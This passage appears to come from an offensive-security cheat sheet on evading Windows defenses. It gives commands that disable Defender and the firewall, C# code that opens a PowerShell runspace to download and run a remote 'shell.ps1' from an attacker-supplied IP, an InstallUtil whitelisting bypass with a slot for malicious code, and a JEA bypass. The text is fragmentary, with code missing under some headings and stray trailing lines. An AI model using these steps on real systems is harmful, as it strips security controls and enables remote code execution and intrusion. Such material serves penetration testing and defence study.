This section contains several techniques to bypass or defeat security controls, safeguards, or defensive mechanisms put in place by an organization to protect its systems and data.
Disable AV & Firewall
# Alternative 1Set-MpPreference-DisableIntrusionPreventionSystem $true-DisableIOAVProtection $true-DisableRealtimeMonitoring $true-DisableScriptScanning $true# Alternative 2"C:\Program Files\Windows Defender\MpCmdRun.exe"-RemoveDefinitions -AllSet-NetFirewallProfile-Profile Domain,Public,Private -Enabled False
Antimalware Scan Interface (AMSI)
The Antimalware Scan Interface (AMSI) is a security feature in Windows operating systems that provides a standardized interface for antivirus and other security applications to integrate with scripting engines and applications.
To disable AMSI on PowerShell you can execute any of the following alternatives.
Constrained Language Mode is a security feature designed to restrict the capabilities of PowerShell scripts, making them more secure and less prone to exploitation. When Constrained Language Mode is enabled, PowerShell restricts the use of certain language elements and cmdlets to help prevent potential malicious activities.
There are several alternatives to obtain a PowerShell process with a new RunSpace.
// Console APP (.NET Framework)usingSystem;// right-click the References folder in the Solution Explorer and select Add Reference// Click on Assemblies menu (left-hand side) and look for System.Configuration.InstallusingSystem.Configuration.Install;// right-click the References folder in the Solution Explorer and select Add Reference// select the Browse… button at the bottom of the window and navigate to// C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dllusingSystem.Management.Automation;usingSystem.Management.Automation.Runspaces;namespaceBypass{classProgram {staticvoidMain(string[] args) {String cmd ="(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1') | IEX";Runspace rs =RunspaceFactory.CreateRunspace();rs.Open();PowerShell ps =PowerShell.Create();ps.Runspace= rs;ps.AddScript(cmd);ps.Invoke();rs.Close(); } }}
Compile the following CSharp code in Visual Studio as clm.exe.
// Console APP (.NET Framework)usingSystem;// right-click the References folder in the Solution Explorer and select Add Reference// Click on Assemblies menu (left-hand side) and look for System.Configuration.InstallusingSystem.Configuration.Install;// right-click the References folder in the Solution Explorer and select Add Reference// select the Browse… button at the bottom of the window and navigate to// C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dllusingSystem.Management.Automation;usingSystem.Management.Automation.Runspaces;namespaceBypass{classProgram {staticvoidMain(string[] args) { // the Main method is not part of the application whitelisting, it can be used for other puposes, like bypassing AVsConsole.WriteLine("Totatlly useless"); } } [System.ComponentModel.RunInstaller(true)]publicclassSample:System.Configuration.Install.Installer {publicoverridevoidUninstall(System.Collections.IDictionary savedState) {<YOUR_MALICIOUS_CHSARP_CODE> } }}
Use installutil.exe to execute clm.exe so the Uninstall method is executed.
Proxy servers are commonly employed in networks to monitor and control internet traffic, and they may inspect and filter PowerShell-related activities. Attackers, however, may employ various evasion techniques to circumvent these security measures.
Just Enough Administration (JEA) is a security feature in Windows Server that allows administrators to delegate specific administrative tasks to users, limiting their permissions to only what is necessary for those tasks. JEA helps organizations enhance security by reducing the risk associated with providing broad administrative access.
A simple JEA bypass is by creating a new function and calling it.
functionCommandName { whoami |out-host }
Last updated
If powershell_shell dies, it is quite likely that the whole meterpreter reverse shell will die.
The directories where we have write access doesn't mean that with AppLocker enable we can execute them.